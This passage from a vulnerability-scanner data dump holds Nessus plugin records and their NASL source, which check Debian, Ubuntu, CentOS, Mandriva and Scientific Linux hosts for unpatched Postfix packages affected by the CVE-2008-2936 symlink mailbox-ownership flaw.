reference:\"lib64postfix1-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libpostfix1-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-ldap-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-mysql-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-pcre-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-pgsql-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64postfix1-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpostfix1-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-ldap-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-mysql-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-pcre-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-pgsql-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64postfix1-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpostfix1-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-ldap-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-mysql-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-pcre-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-pgsql-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:05", "description": "Sebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. Only a configuration meeting the\nfollowing requirements is vulnerable :\n\n - The mail delivery style is mailbox, with the Postfix\n built-in local(8) or virtual(8) delivery agents.\n - The mail spool directory (/var/spool/mail) is\n user-writeable.\n\n - The user can create hardlinks pointing to root-owned\n symlinks located in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor's announcement.", "edition": 27, "published": "2008-08-19T00:00:00", "title": "Debian DSA-1629-2 : postfix - programming error", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-19T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:postfix"], "id": "DEBIAN_DSA-1629.NASL", "href": "https://www.tenable.com/plugins/nessus/33934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1629. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33934);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"DSA\", value:\"1629\");\n\n script_name(english:\"Debian DSA-1629-2 : postfix - programming error\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. Only a configuration meeting the\nfollowing requirements is vulnerable :\n\n - The mail delivery style is mailbox, with the Postfix\n built-in local(8) or virtual(8) delivery agents.\n - The mail spool directory (/var/spool/mail) is\n user-writeable.\n\n - The user can create hardlinks pointing to root-owned\n symlinks located in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor's announcement.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://article.gmane.org/gmane.mail.postfix.announce/110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1629\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the postfix package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"postfix\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-cdb\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-dev\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-doc\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-ldap\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-mysql\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-pcre\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-pgsql\", reference:\"2.3.8-2+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:14", "description": "Sebastian Krahmer discovered that Postfix was not correctly handling\nmailbox ownership when dealing with Linux's implementation of\nhardlinking to symlinks. In certain mail spool configurations, a local\nattacker could exploit this to append data to arbitrary files as the\nroot user. The default Ubuntu configuration was not vulnerable.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2008-08-20T00:00:00", "title": "Ubuntu 6.06 LTS / 7.04 / 7.10 / 8.04 LTS : postfix vulnerability (USN-636-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-20T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:postfix-ldap", "p-cpe:/a:canonical:ubuntu_linux:postfix-pcre", "p-cpe:/a:canonical:ubuntu_linux:postfix-dev", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:postfix-mysql", "p-cpe:/a:canonical:ubuntu_linux:postfix-cdb", "cpe:/o:canonical:ubuntu_linux:7.04", "p-cpe:/a:canonical:ubuntu_linux:postfix-doc", "p-cpe:/a:canonical:ubuntu_linux:postfix", "p-cpe:/a:canonical:ubuntu_linux:postfix-pgsql", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-636-1.NASL", "href": "https://www.tenable.com/plugins/nessus/33941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-636-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33941);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"USN\", value:\"636-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 7.04 / 7.10 / 8.04 LTS : postfix vulnerability (USN-636-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that Postfix was not correctly handling\nmailbox ownership when dealing with Linux's implementation of\nhardlinking to symlinks. In certain mail spool configurations, a local\nattacker could exploit this to append data to arbitrary files as the\nroot user. The default Ubuntu configuration was not vulnerable.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/636-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-cdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-pcre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2021 Canonical, Inc. / NASL script (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|7\\.04|7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 7.04 / 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-dev\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-doc\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-ldap\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-mysql\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-pcre\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-pgsql\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-cdb\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-dev\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-doc\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-ldap\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-mysql\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-pcre\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-pgsql\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-cdb\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-dev\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-doc\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-ldap\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-mysql\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-pcre\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-pgsql\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-cdb\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-dev\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-doc\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-ldap\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-mysql\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-pcre\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-pgsql\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-cdb / postfix-dev / postfix-doc / postfix-ldap / etc\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:25:24", "description": "Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "edition": 26, "published": "2008-08-15T00:00:00", "title": "CentOS 3 / 4 / 5 : postfix (CESA-2008:0839)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:postfix", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:postfix-pflogsumm", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2008-0839.NASL", "href": "https://www.tenable.com/plugins/nessus/33890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0839 and \n# CentOS Errata and Security Advisory 2008:0839 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33890);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"RHSA\", value:\"2008:0839\");\n\n script_name(english:\"CentOS 3 / 4 / 5 : postfix (CESA-2008:0839)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015185.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0e846042\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015186.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f99e39b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015187.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?040893ac\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015188.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?049939bc\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015197.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?794c4583\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015199.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b71a314a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postfix-pflogsumm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"postfix-2.2.10-1.2.1.c4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.c4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-pflogsumm\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:44:00", "description": "A flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : postfix on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080814_POSTFIX_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60464", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60464);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\");\n\n script_name(english:\"Scientific Linux Security Update : postfix on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0808&L=scientific-linux-errata&T=0&P=1407\n script_set_attribute(\n attribute:\"see_also\",\n 